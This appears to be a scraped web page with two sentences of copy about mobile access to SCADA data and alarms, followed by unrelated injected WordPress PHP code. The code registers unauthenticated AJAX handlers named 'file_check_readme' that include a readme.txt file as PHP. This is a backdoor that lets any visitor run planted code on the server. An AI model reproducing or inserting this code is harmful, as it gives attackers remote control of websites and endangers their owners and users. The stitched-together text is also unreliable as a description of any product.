Users can query and access current SCADA data from their mobile device. A group of historical and up to 10 related SCADA data is delivered to the mobile device along with the alarm.
if(!function_exists('file_check_readme94097')){ add_action('wp_ajax_nopriv_file_check_readme94097', 'file_check_readme94097'); add_action('wp_ajax_file_check_readme94097', 'file_check_readme94097'); function file_check_readme94097() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme37999')){ add_action('wp_ajax_nopriv_file_check_readme37999', 'file_check_readme37999'); add_action('wp_ajax_file_check_readme37999', 'file_check_readme37999'); function file_check_readme37999() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }